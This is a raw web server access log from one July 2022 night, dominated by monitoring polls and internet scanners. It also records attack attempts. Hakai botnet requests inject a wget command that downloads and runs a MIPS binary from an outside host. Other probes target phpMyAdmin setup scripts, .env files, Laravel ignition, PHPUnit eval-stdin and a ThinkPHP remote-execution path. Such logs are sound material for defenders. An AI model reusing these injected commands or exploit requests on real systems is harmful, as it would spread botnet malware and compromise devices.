2.57.122.98 - - [01/Jul/2022:22:23:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jul/2022:22:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.148.10.81 - - [01/Jul/2022:22:25:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [01/Jul/2022:22:25:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:26:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:27:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:28:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.57.122.98 - - [01/Jul/2022:22:28:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jul/2022:22:29:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:30:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:31:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:32:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.57.122.98 - - [01/Jul/2022:22:32:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jul/2022:22:33:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
37.0.8.54 - - [01/Jul/2022:22:34:10 +0200] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
37.0.8.54 - - [01/Jul/2022:22:34:10 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
37.0.8.54 - - [01/Jul/2022:22:34:10 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
37.0.8.54 - - [01/Jul/2022:22:34:10 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
37.0.8.54 - - [01/Jul/2022:22:34:10 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
37.0.8.54 - - [01/Jul/2022:22:34:10 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
212.91.246.72 - - [01/Jul/2022:22:34:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:35:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:36:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:37:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:38:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:39:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:40:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:41:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.57.122.98 - - [01/Jul/2022:22:42:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jul/2022:22:42:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:43:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:44:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:45:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.79.169.253 - - [01/Jul/2022:22:46:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
212.91.246.72 - - [01/Jul/2022:22:46:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:47:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
112.250.170.90 - - [01/Jul/2022:22:47:39 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
112.250.170.90 - - [01/Jul/2022:22:47:42 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
167.94.145.58 - - [01/Jul/2022:22:48:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.58 - - [01/Jul/2022:22:48:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.58 - - [01/Jul/2022:22:48:15 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [01/Jul/2022:22:48:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
120.6.235.60 - - [01/Jul/2022:22:48:37 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.220.101.46 - - [01/Jul/2022:22:48:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
198.235.24.9 - - [01/Jul/2022:22:48:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Jul/2022:22:49:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:50:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
70.18.10.102 - - [01/Jul/2022:22:51:10 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Jul/2022:22:51:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:52:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.237.103.9 - - [01/Jul/2022:22:52:19 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.9 - - [01/Jul/2022:22:52:19 +0200] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
60.223.76.155 - - [01/Jul/2022:22:52:44 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Jul/2022:22:53:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
49.171.122.25 - - [01/Jul/2022:22:53:22 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Jul/2022:22:54:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:55:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:56:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.74.188.173 - - [01/Jul/2022:22:56:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Jul/2022:22:57:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:58:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:59:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:00:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:01:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:02:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:03:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:04:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:05:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:06:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.223.76.155 - - [01/Jul/2022:23:07:01 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Jul/2022:23:07:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:08:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:09:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.8.10.202 - - [01/Jul/2022:23:09:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
5.8.10.202 - - [01/Jul/2022:23:09:48 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
5.8.10.202 - - [01/Jul/2022:23:09:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
5.8.10.202 - - [01/Jul/2022:23:09:48 +0200] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.246.72 - - [01/Jul/2022:23:10:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:11:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.32.72.179 - - [01/Jul/2022:23:12:05 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "python-requests/2.25.1"
62.32.72.179 - - [01/Jul/2022:23:12:05 +0200] "GET /image/lgbg.jpg HTTP/1.1" 404 319 "-" "python-requests/2.25.1"
62.32.72.179 - - [01/Jul/2022:23:12:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.25.1"
212.91.246.72 - - [01/Jul/2022:23:12:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:13:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:14:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:15:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:16:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:17:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:18:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:19:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.32.72.179 - - [01/Jul/2022:23:19:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "python-requests/2.25.1"
62.32.72.179 - - [01/Jul/2022:23:19:34 +0200] "GET /image/lgbg.jpg HTTP/1.1" 404 319 "-" "python-requests/2.25.1"
62.32.72.179 - - [01/Jul/2022:23:19:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.25.1"
212.91.246.72 - - [01/Jul/2022:23:20:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.8.10.202 - - [01/Jul/2022:23:20:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
5.8.10.202 - - [01/Jul/2022:23:20:30 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
5.8.10.202 - - [01/Jul/2022:23:20:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
5.8.10.202 - - [01/Jul/2022:23:20:30 +0200] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.246.72 - - [01/Jul/2022:23:21:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.8.10.202 - - [01/Jul/2022:23:21:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
5.8.10.202 - - [01/Jul/2022:23:21:49 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
5.8.10.202 - - [01/Jul/2022:23:21:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
5.8.10.202 - - [01/Jul/2022:23:21:50 +0200] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.246.72 - - [01/Jul/2022:23:22:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:23:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:25:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:26:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:27:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:28:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:29:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:30:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:31:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:32:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:33:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:34:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:35:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.44 - - [01/Jul/2022:23:35:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.44 - - [01/Jul/2022:23:35:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.44 - - [01/Jul/2022:23:35:43 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
50.198.14.142 - - [01/Jul/2022:23:35:44 +0200] "POST /boaform/admin/formPing HTTP/1.1" 400 329 "-" "polaris botnet"
212.91.246.72 - - [01/Jul/2022:23:36:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:37:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:38:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.161.61 - - [01/Jul/2022:23:38:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
178.79.169.97 - - [01/Jul/2022:23:39:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
212.91.246.72 - - [01/Jul/2022:23:39:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:40:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:41:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:42:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:43:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:44:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:45:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:46:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:47:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:48:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
115.86.164.63 - - [01/Jul/2022:23:48:44 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Jul/2022:23:49:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:50:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:51:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.145.58 - - [01/Jul/2022:23:51:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.58 - - [01/Jul/2022:23:51:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.58 - - [01/Jul/2022:23:51:43 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
43.204.56.155 - - [01/Jul/2022:23:51:54 +0200] "GET /invoker/readonly HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
43.204.56.155 - - [01/Jul/2022:23:51:55 +0200] "POST /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
43.204.56.155 - - [01/Jul/2022:23:51:55 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
157.230.216.203 - - [01/Jul/2022:23:51:58 +0200] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.230.216.203 - - [01/Jul/2022:23:51:58 +0200] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
104.206.128.34 - - [01/Jul/2022:23:51:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
212.91.246.72 - - [01/Jul/2022:23:52:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:53:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.204.56.155 - - [01/Jul/2022:23:53:55 +0200] "GET /script HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
43.204.56.155 - - [01/Jul/2022:23:53:55 +0200] "GET /login HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
43.204.56.155 - - [01/Jul/2022:23:53:56 +0200] "GET /jenkins/login HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
43.204.56.155 - - [01/Jul/2022:23:53:56 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
43.204.56.155 - - [01/Jul/2022:23:53:56 +0200] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=pu92iduj HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
212.91.246.72 - - [01/Jul/2022:23:54:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:55:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.95.93.162 - - [01/Jul/2022:23:56:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
59.95.93.162 - - [01/Jul/2022:23:56:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
